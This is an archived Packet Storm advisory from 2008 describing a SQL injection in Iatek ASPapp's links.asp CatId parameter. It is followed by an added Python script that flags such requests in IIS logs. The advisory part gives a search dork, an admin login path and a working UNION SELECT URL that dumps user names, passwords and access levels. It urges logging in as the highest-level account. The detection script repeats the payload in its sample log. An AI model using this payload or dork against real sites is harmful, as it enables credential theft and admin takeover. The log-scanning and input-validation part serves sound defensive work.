aspapp-sql.txt

2008-03-19T00:00:00
ID PACKETSTORM:64723
Type packetstorm
Reporter xcorpitx
Modified 2008-03-19T00:00:00

Description

                                        
`
  
-----------------Turkey--------------------------------------  
  
--------- www.Hayalet-hack.com-------------------------------  
  
----------www.xcorpitx-hack.com------------------------------  
Iatek | ASPapp - links.asp (CatId) SQL Injection Vulnerability
-------------------------------------------------  
You'll see lots of users like this, but accesslevel will help you see which one is the admin.
-------------------------------------------------------------  
----------------example--------------------------------------  
  
Links › guest › 12 › 1 user
Links › editor › editor › 2 moderator
Links › manager › manager › 2 moderator
Links › surco › surco › 2 moderator
Links › admin › admin › 3 admin
Links › ovivas › ovivas › 4 super-admin ----- we'll log in with this username
-------------------------------------------------------------  
  
-------------------------------------------------------------  
I mean, when you see a big number like 4 or 5, you can use this username and password.
-------------------------------------------------------------  
  
-------  
dork - ''links.asp?CatId''  
-------  
exploit-  
-------  
admin login-   
-------  
www.xxx.com/path/login.asp?ret_page=%2Fzmicer%2Fweb%2Fadmin%2Easp%3F  
-------  
-------------------------------------------------------------  
links.asp?CatId=-99999%20UNION%20SELECT%20null,accesslevel,null,null,user_name,%205%20,password,null%20FROM%20Users  
-------------------------------------------------------------  
  
thanx- str0ke-D3ng3siz-pc faresi-s@bun-Hayalet-Turque-  
  
  
  
`
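
Detection example (added here, not part of the original advisory and not vendor code): the sketch below scans IIS W3C logs for requests to links.asp whose CatId value is not a plain integer, which is how the UNION SELECT request shown above appears in a log. The log lines, field order and the 9-digit limit on category ids are constructed assumptions.

```python
import re
from urllib.parse import unquote

# Constructed IIS W3C log sample (not from the advisory); IPs are documentation ranges.
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2008-03-20 10:01:02 GET /links.asp CatId=7 192.0.2.10 200
2008-03-20 10:01:09 GET /links.asp CatId=-99999%20UNION%20SELECT%20null,accesslevel,null,null,user_name,%205%20,password,null%20FROM%20Users 198.51.100.23 200
2008-03-20 10:02:11 GET /Links.ASP catid=12&page=2 192.0.2.11 200
2008-03-20 10:03:40 GET /links.asp CatId=3%27 198.51.100.23 500
2008-03-20 10:04:00 GET /default.asp - 192.0.2.10 200
"""

CATID_OK = re.compile(r"[0-9]{1,9}")            # assumption: ids are small non-negative integers
SQL_WORDS = re.compile(r"\b(union|select|from)\b", re.I)

def flag_catid_requests(log_text):
    """Return (client_ip, status, reason, decoded_value) for suspicious CatId values."""
    fields, hits = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]            # column order is declared by the log itself
            continue
        if not line or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split()))
        if not row.get("cs-uri-stem", "").lower().endswith("/links.asp"):
            continue
        for part in row.get("cs-uri-query", "").split("&"):
            name, _, raw = part.partition("=")
            if unquote(name).lower() != "catid":  # ASP query-string keys are case-insensitive
                continue
            value = unquote(raw.replace("+", " "))
            if CATID_OK.fullmatch(value):
                continue                          # plain integer: expected traffic
            reason = "sql-keyword" if SQL_WORDS.search(value) else "non-integer"
            hits.append((row.get("c-ip"), row.get("sc-status"), reason, value))
    return hits

if __name__ == "__main__":
    for hit in flag_catid_requests(SAMPLE_LOG):
        print(hit)
```

The same allow-list (CatId must be a plain integer) is the check links.asp should apply before the value reaches the SQL statement, together with a parameterized query.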